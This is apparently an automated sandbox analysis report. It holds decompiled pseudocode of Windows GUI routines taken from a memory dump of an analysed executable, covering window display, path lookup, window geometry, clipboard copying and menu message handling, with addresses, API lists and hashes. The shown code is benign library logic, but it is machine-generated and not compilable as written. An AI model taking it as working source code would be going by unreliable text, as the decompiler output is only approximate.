				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x4bb240; // 0x42642c
					E0040656C(_t294, 0,  &_v12);
					E0040CAC4(_v12, 1);
					E00403DEC();
				}
				_t149 =  *0x4bcb7c; // 0x1c41284
				E00467EA8(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x463b29);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x463a30);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403814(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x4bcb80; // 0x1c40e90
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00462788(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0044D590(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0044D590(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0045E3A4(E0044D590(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0044D590(_v8), 0);
								} else {
									SetWindowPos(E0044D590(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0044D590(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0044AAE8(_v8);
						}
					} else {
						_push(_t372);
						_push(0x463694);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403814(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00464E70() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00464E64() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x4bcb7c; // 0x1c41284
								_t305 = E00446748( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x4bcb7c; // 0x1c41284
								_t248 = E0044678C( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00461A30(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00464EA0() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00464E94() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x4bcb7c; // 0x1c41284
										_t311 = E00446748( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x4bcb7c; // 0x1c41284
										_t269 = E0044678C( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x4bcb7c; // 0x1c41284
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x45ccbc; // 0x45cd08
									_t290 = E004037A4( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00464E70() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00464E64() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00461A30(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0044D590(_v8),  *(0x4a0fa8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0044D590(_v8),  *(0x4a0fa8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407034, E0044D590(_v8), 5, 0, _t220);
								E00446FA4();
							} else {
								_t231 = E0044D590(_v8);
								_t232 =  *0x4bcb7c; // 0x1c41284
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0044D590(_v8), 3);
							}
							_t226 =  *0x4bcb7c; // 0x1c41284
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x463b30);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}

0x004635dd
0x004635df
0x004635e7
0x004635ea
0x004635ef
0x004635f0
0x004635f5
0x004635f8
0x00463602
0x00463613
0x00463618
0x00463627
0x0046362c
0x0046362c
0x00463631
0x00463636
0x0046363e
0x00463647
0x00463648
0x0046364d
0x00463650
0x0046365a
0x00463660
0x00463663
0x0046366a
0x00463a0e
0x00463a0f
0x00463a14
0x00463a17
0x00463a21
0x00463a2b
0x00463a47
0x00463a4f
0x00463a52
0x00463a54
0x00463a59
0x00463a59
0x00463a5e
0x00463a61
0x00463a68
0x00463a77
0x00463a7a
0x00463a81
0x00463aa2
0x00463aa7
0x00463aae
0x00463ab3
0x00463ab5
0x00463ac0
0x00463ac5
0x00463ac7
0x00463ad6
0x00463ad6
0x00463ac7
0x00463ad8
0x00463ada
0x00463b0c
0x00463adc
0x00463af4
0x00463afa
0x00463afa
0x00463a83
0x00463a9b
0x00463a9b
0x00463a6a
0x00463a6d
0x00463a6d
0x00463670
0x00463672
0x00463673
0x00463678
0x0046367b
0x00463685
0x0046368f
0x004636b5
0x004636e1
0x0046372a
0x0046372a
0x0046372d
0x0046372f
0x00463731
0x00463731
0x00463741
0x00463741
0x00463744
0x00463746
0x00463748
0x00463748
0x004636e3
0x004636e3
0x004636f5
0x004636f8
0x004636fa
0x004636fc
0x004636fc
0x004636ff
0x0046370f
0x00463712
0x00463714
0x00463716
0x00463716
0x00463714
0x0046374d
0x0046374f
0x0046374f
0x00463753
0x00463755
0x00463755
0x00463765
0x0046376e
0x0046377b
0x00463784
0x00463784
0x0046378e
0x00463791
0x0046379c
0x0046379f
0x00463873
0x00463875
0x0046387b
0x0046387e
0x00463885
0x004638ce
0x004638ce
0x004638d1
0x004638d3
0x004638d5
0x004638d5
0x004638e5
0x004638e5
0x004638e8
0x004638ea
0x004638ec
0x004638ec
0x00463887
0x00463887
0x00463899
0x00463899
0x0046389c
0x0046389e
0x004638a0
0x004638a0
0x004638a3
0x004638b3
0x004638b3
0x004638b6
0x004638b8
0x004638ba
0x004638ba
0x004638b8
0x004638ef
0x004638f1
0x004638f3
0x004638f3
0x004638f3
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x004638f9
0x00463912
0x00463912
0x004637a5
0x004637a5
0x004637aa
0x004637ad
0x004637b0
0x004637b7
0x004637bf
0x004637c5
0x004637ca
0x004637cc
0x004637d1
0x004637d1
0x004637cc
0x004637d4
0x004637d6
0x0046380f
0x0046380f
0x00463812
0x00463814
0x00463816
0x00463816
0x00463826
0x00463826
0x00463829
0x0046382b
0x0046382d
0x0046382d
0x004637d8
0x004637de
0x004637de
0x004637e1
0x004637e3
0x004637e5
0x004637e5
0x004637e8
0x004637f1
0x004637f1
0x004637f4
0x004637f6
0x004637f8
0x004637f8
0x004637fb
0x004637fb
0x00463830
0x00463832
0x00463834
0x00463834
0x00463834
0x00463836
0x00463838
0x0046383a
0x0046383a
0x0046383a
0x0046384a
0x00463853
0x00463859
0x0046385c
0x00463860
0x00463869
0x00463869
0x00463860
0x0046379f
0x0046391b
0x0046392c
0x00463a02
0x00463932
0x0046393c
0x0046398f
0x004639a3
0x004639a3
0x004639b8
0x004639c0
0x0046393e
0x00463943
0x0046394e
0x0046395d
0x0046396d
0x0046396d
0x004639ce
0x004639dd
0x004639dd
0x0046392c
0x0046366a
0x00463b13
0x00463b16
0x00463b19
0x00463b1e
0x00463b21
0x00463b28

APIs

SendMessageA.USER32 ref: 0046395D

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

Strings

,dB, xrefs: 00463613

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID: ,dB
API String ID: 1946433856-1465247881
Opcode ID: 2902a0ffdb6b89ca15bca380394013b9d9f0993611f3192c7cf1c65aadb5d95a
Instruction ID: 968ff6dd98cb27b000d08eb0cd8059689d0198bfd324794eb7d3060a0c65b276
Opcode Fuzzy Hash: 2902a0ffdb6b89ca15bca380394013b9d9f0993611f3192c7cf1c65aadb5d95a
Instruction Fuzzy Hash: 1FF15C74A04284EFDB00DFA9D9C5F9E77F4AB04305F1441A6E904AB3A2E779BE01DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA4, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AA4(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				struct _WIN32_FIND_DATAA _v346;
				char _v607;
				char* _t75;
				char* _t85;
				void* _t108;
				void* _t112;
				struct HINSTANCE__* _t114;
				void* _t115;
				void* _t116;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t114 = GetModuleHandleA("kernel32.dll");
				if(_t114 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_v20 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_v20 = E00405A78(_v8 + 2);
							if( *_v20 != 0) {
								_v20 = E00405A78(_v20 + 1);
								if( *_v20 != 0) {
									L10:
									_t108 = _v20 - _v8;
									_push(_t108 + 1);
									_push(_v8);
									_push( &_v607);
									L00401350();
									while( *_v20 != 0) {
										_v24 = E00405A78(_v20 + 1);
										_t112 = _v24 - _v20;
										if(_t112 + _t108 + 1 <= 0x105) {
											_push(_t112 + 1);
											_push(_v20);
											_push( &(( &_v607)[_t108]));
											L00401350();
											_t115 = FindFirstFileA( &_v607,  &_v346);
											if(_t115 != 0xffffffff) {
												FindClose(_t115);
												_t75 =  &(_v346.cFileName);
												_push(_t75);
												L00401358();
												if(_t75 + _t108 + 1 + 1 <= 0x105) {
													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
													_push(0x105 - _t108 - 1);
													_push( &(_v346.cFileName));
													_push( &(( &(( &_v607)[_t108]))[1]));
													L00401350();
													_t85 =  &(_v346.cFileName);
													_push(_t85);
													L00401358();
													_t108 = _t108 + _t85 + 1;
													_v20 = _v24;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v607);
									_push(_v8);
									L00401350();
								}
							}
						}
					}
				} else {
					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
					if(_v28 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v607);
						_push(_v8);
						if(_v28() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v607);
							_push(_v8);
							L00401350();
						}
					}
				}
				L17:
				return _v16;
			}

0x00405ab0
0x00405ab3
0x00405ab9
0x00405ac6
0x00405aca
0x00405b10
0x00405b16
0x00405b5f
0x00000000
0x00405b18
0x00405b1f
0x00405b30
0x00405b39
0x00405b48
0x00405b51
0x00405b62
0x00405b65
0x00405b6b
0x00405b6f
0x00405b76
0x00405b77
0x00405c2c
0x00405b8a
0x00405b90
0x00405b9d
0x00405ba4
0x00405ba8
0x00405bb1
0x00405bb2
0x00405bca
0x00405bcf
0x00405bd2
0x00405bd7
0x00405bdd
0x00405bde
0x00405bee
0x00405bf0
0x00405c00
0x00405c07
0x00405c11
0x00405c12
0x00405c17
0x00405c1d
0x00405c1e
0x00405c24
0x00405c29
0x00000000
0x00405c29
0x00405bee
0x00405bcf
0x00000000
0x00405b9d
0x00405c3b
0x00405c42
0x00405c46
0x00405c47
0x00405c47
0x00405b51
0x00405b39
0x00405b1f
0x00405acc
0x00405ad7
0x00405ade
0x00000000
0x00405ae0
0x00405ae0
0x00405aeb
0x00405aef
0x00405af5
0x00000000
0x00405af7
0x00405afa
0x00405b01
0x00405b05
0x00405b06
0x00405b06
0x00405af5
0x00405ade
0x00405c4c
0x00405c55

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,004A00A4), ref: 00405AC1
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,00000000,?,004A00A4), ref: 00405AD2
lstrcpyn.KERNEL32(?,?,?,?,004A00A4), ref: 00405B06
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405B77
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BB2
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BC5
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BD2
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BDE
lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00405C12
lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00405C1E
lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00405C47

Strings

kernel32.dll, xrefs: 00405ABC
GetLongPathNameA, xrefs: 00405ACC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$kernel32.dll
API String ID: 3245196872-3214324292
Opcode ID: b7924c17d42b7d57107182fb1ba37407b3a0410cc5c986d2e9c1e5bc52d54a41
Instruction ID: c16df395c2a1ad26ff2f6ad30aaa355077f380372b78c042783e438d5ca8a1e7
Opcode Fuzzy Hash: b7924c17d42b7d57107182fb1ba37407b3a0410cc5c986d2e9c1e5bc52d54a41
Instruction Fuzzy Hash: E3511A71900619AFDB11EBA9CC89ADFB7B8EF44304F5405A6E415F7291D738AE408F68

Uniqueness

Uniqueness Score: -1.00%

Function 0044D8A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0044D8A0(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00446370(_t43);
			}

0x0044d8a3
0x0044d8a6
0x0044d8b6
0x0044d8e5
0x0044d8b8
0x0044d8b8
0x0044d8cc
0x0044d8d7
0x0044d8d8
0x0044d8d9
0x0044d8da
0x0044d8da
0x0044d8fd
0x0044d90d
0x0044d911
0x0044d915
0x0044d920
0x0044d920
0x0044d911
0x0044d928
0x0044d92f
0x0044d939
0x0044d944
0x0044d954

APIs

IsIconic.USER32(?), ref: 0044D8AF
GetWindowPlacement.USER32(?,0000002C), ref: 0044D8CC
GetWindowRect.USER32 ref: 0044D8E5
GetWindowLongA.USER32(?,000000F0), ref: 0044D8F3
GetWindowLongA.USER32(?,000000F8), ref: 0044D908
ScreenToClient.USER32(00000000), ref: 0044D915
ScreenToClient.USER32(00000000,?), ref: 0044D920

Strings

,, xrefs: 0044D8B8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: d695fc97d7989ff4c2387062a938f213c36b414262ce0d1f5f733a1281b4e392
Instruction ID: 8cccc5413464cead83d6c72cc5650485f778bac1b4378c5be7360fb8d141ed58
Opcode Fuzzy Hash: d695fc97d7989ff4c2387062a938f213c36b414262ce0d1f5f733a1281b4e392
Instruction Fuzzy Hash: 7A118E71908200AFDB41EF6DC885A9B77E8AF49314F04497EFD58DB386D738E9048B66

Uniqueness

Uniqueness Score: -1.00%

Function 0043F6B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0043F6B0(void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _t28;
				void* _t34;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t51;
				intOrPtr _t53;
				void* _t57;
				void* _t58;
				intOrPtr _t59;

				_t57 = _t58;
				_t59 = _t58 + 0xfffffff4;
				_v8 = __edx;
				E00404888(_v8);
				_push(_t57);
				_push(0x43f7e0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59;
				if(OpenClipboard(0) == 0) {
					_t43 =  *0x4bad14; // 0x426624
					E0040CB80(_t43, 1);
					E00403DEC();
					_pop(_t51);
					 *[fs:eax] = _t51;
					_push(0x43f7e7);
					return E004043D8( &_v8);
				} else {
					_push(_t57);
					_push(0x43f7ac);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_v12 = GlobalAlloc(0x2002, E00404698(_v8) + 1);
					_push(_t57);
					_push(0x43f781);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_t28 = _v12;
					GlobalFix(_t28);
					_v16 = _t28;
					_push(_t57);
					_push(0x43f770);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_push(E00404698(_v8) + 1);
					_t34 = E00404898(_v8);
					_pop(_t46);
					E00402D04(_t34, _t46, _v16);
					EmptyClipboard();
					SetClipboardData(1, _v12);
					_pop(_t53);
					 *[fs:eax] = _t53;
					_push(0x43f777);
					return GlobalUnWire(_v12);
				}
			}

0x0043f6b1
0x0043f6b3
0x0043f6b9
0x0043f6bf
0x0043f6c6
0x0043f6c7
0x0043f6cc
0x0043f6cf
0x0043f6db
0x0043f7b3
0x0043f7c0
0x0043f7c5
0x0043f7cc
0x0043f7cf
0x0043f7d2
0x0043f7df
0x0043f6e1
0x0043f6e3
0x0043f6e4
0x0043f6e9
0x0043f6ec
0x0043f703
0x0043f708
0x0043f709
0x0043f70e
0x0043f711
0x0043f714
0x0043f718
0x0043f71d
0x0043f722
0x0043f723
0x0043f728
0x0043f72b
0x0043f737
0x0043f73b
0x0043f743
0x0043f744
0x0043f749
0x0043f754
0x0043f75b
0x0043f75e
0x0043f761
0x0043f76f
0x0043f76f

APIs

OpenClipboard.USER32(00000000), ref: 0043F6D4
GlobalAlloc.KERNEL32(00002002,00000001,00000000,0043F7AC,?,00000000,0043F7E0), ref: 0043F6FE
GlobalFix.KERNEL32(?), ref: 0043F718
EmptyClipboard.USER32 ref: 0043F749
SetClipboardData.USER32 ref: 0043F754
GlobalUnWire.KERNEL32(?), ref: 0043F76A

Strings

$fB, xrefs: 0043F7B3

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocDataEmptyOpenWire
String ID: $fB
API String ID: 461592451-1802558387
Opcode ID: 8b792b2d8ac1b0ab78293e736dd5d8a684ce7d47b8d1a21e75b5dc90bcd722e9
Instruction ID: bb59d9d95091380884986bc9d156bbf03a32f95fc7828fb7c284fa9b77be642a
Opcode Fuzzy Hash: 8b792b2d8ac1b0ab78293e736dd5d8a684ce7d47b8d1a21e75b5dc90bcd722e9
Instruction Fuzzy Hash: 5F21E574A04644AFDB01FBA5CC53D6DBBBCEB49704B62047AF900E3691C73DAD10DA29

Uniqueness

Uniqueness Score: -1.00%

Function 0045B7EC, Relevance: 10.9, APIs: 7, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0045B7EC(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t186;
				void* _t214;
				void* _t218;
				void* _t252;
				void* _t254;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t307;
				intOrPtr _t329;
				intOrPtr _t338;
				intOrPtr _t342;
				intOrPtr* _t349;
				signed int _t351;
				intOrPtr* _t352;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t373;
				void* _t374;
				intOrPtr _t375;
				void* _t376;

				_t373 = _t374;
				_t375 = _t374 + 0xffffffd0;
				_t293 = 0;
				_v52 = 0;
				_t371 = __edx;
				_v8 = __eax;
				_push(_t373);
				_push(0x45bd1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t375;
				_t137 =  *__edx;
				_t376 = _t137 - 0x111;
				if(_t376 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t363 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0045AB68(E0041C834(_v8, _t293, _t363),  *(_t371 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t363 = _t363 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x4bb048; // 0x4bcb7c
								E00467DB8( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t364 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t371 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t371 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t371 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041C834(_v8, _t293, _t364);
